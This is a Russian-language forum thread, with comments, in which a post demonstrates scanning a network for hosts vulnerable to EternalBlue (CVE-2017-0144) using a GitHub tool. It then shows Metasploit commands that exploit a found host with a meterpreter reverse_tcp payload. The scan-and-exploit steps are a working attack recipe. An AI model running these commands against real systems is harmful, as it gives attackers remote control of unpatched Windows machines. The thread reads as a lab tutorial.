Уважаемый Вандер,что-то ваша ссылочка барахлит а вот это рабочая 1git clone https://github.com/peterpt/eternal_scanner
Последнее редактирование:
Следуйте инструкциям в видео ниже, чтобы узнать, как установить наш сайт как веб-приложение на главный экран вашего устройства.
Примечание: Эта функция может быть недоступна в некоторых браузерах.
Статья читается полностью. Тезисы со ссылками на разделы появятся позже.
простите это вы мне??ц-ц-ц-ц не хорошо инфу из грэй-секции выносить!))))
нет)) автору !простите это вы мне??
Инфа далеко не секретная, в целях просвещения, лишьц-ц-ц-ц не хорошо инфу из грэй-секции выносить!))))
Виноват, исправился)Уважаемый Вандер,что-то ваша ссылочка барахлит а вот это рабочая 1***Скрытый текст***
Уважаемый Vander что это означает:
root@Server:~/eternal_scanner# ls -l
итого 44
-rw-r--r-- 1 root root 938 июл 30 09:53 changelog.md
-rwxr-xr-x 1 root root 1446 июл 30 09:53 elog
-rwxr-xr-x 1 root root 17267 июл 30 09:53 escan
-rw-r--r-- 1 root root 1064 июл 30 09:53 LICENSE
-rw-r--r-- 1 root root 1080 июл 30 09:53 readme.md
-rw-r--r-- 1 root root 4452 июл 30 09:53 use.md
root@Server:~/eternal_scanner# ./escan
Masscan Missing
root@Server:~/eternal_scanner#
команда ls понятно, но при вводе ./escan в место Eternal Scannera выводит Masscan Missing. Вот что я хотел уточнить...
выводит ошибку будто нет соединенияВсем привет! В этой статье я хочу продемонстрировать работу сканера, который способен отыскать в сети уязвимые для EternalBlue ( CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, хосты.
Итак, собственно – Eternal Scanner.
Посмотреть вложение 10864
CVE-2017-0144 Описание:
Сервер SMBv1 в Microsoft Windows Vista SP2; Windows Server 2008 SP2 и R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold и R2; Windows RT 8.1; И Windows 10 Gold, 1511 и 1607; И Windows Server 2016 Позволяет атакующим удаленно выполнять произвольный код с помощью видоизмененных пакетов как в “Windows SMB Remote Code Execution Vulnerability.”. Эта уязвимость отличается от описанной в CVE-2017-0143, CVE-2017-0145, CVE-2017-0146 , И CVE-2017-0148.
Установка:
> git clone https://github.com/peterpt/eternal_scanner
> cd eternal_scanner
> ls –l
Посмотреть вложение 10865
Запуск:
> ./escan
Посмотреть вложение 10866
Далее, вводим интересующий нас адрес или диапазон, по маске.
Посмотреть вложение 10867
Ждем окончания сканирования:
Посмотреть вложение 10868
По итогу проверки обнаружилось три хоста уязвимые к данной атаке:
Посмотреть вложение 10869
Результаты проверки сканер услужливо сложил в текстовый файлик:
Посмотреть вложение 10870
На этом, пожалуй, все, пойду закрывать дырки…
Хотя, сначала, чуть попробую, не соврал ли сканер.
> msfconsole
> use exploit/windows/smb/ms17_010_eternalblue
> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.158
> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.180
> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
> msf exploit(ms17_010_eternalblue) >exploit
Посмотреть вложение 10871
Пока, все идет ровно. И буквально через 30 сек:
Посмотреть вложение 10872
Теперь можно идти, спасибо за внимание.
интернет есть через него сижу но работает через проксиМожет его и правда нет?
в msf exploit только до 2008 сервака, на гитхабе есть же и 2012, и для него текстовик будет актуален ..в чём смысл этого скрипта если потом всё равно мсф запускать?) в мсф уже есть модуль для проверки - https://www.rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010
не обратил внимания. нада будет добавить в мсф)в msf exploit только до 2008 сервака, на гитхабе есть же и 2012, и для него текстовик будет актуален ..
Комментарии
26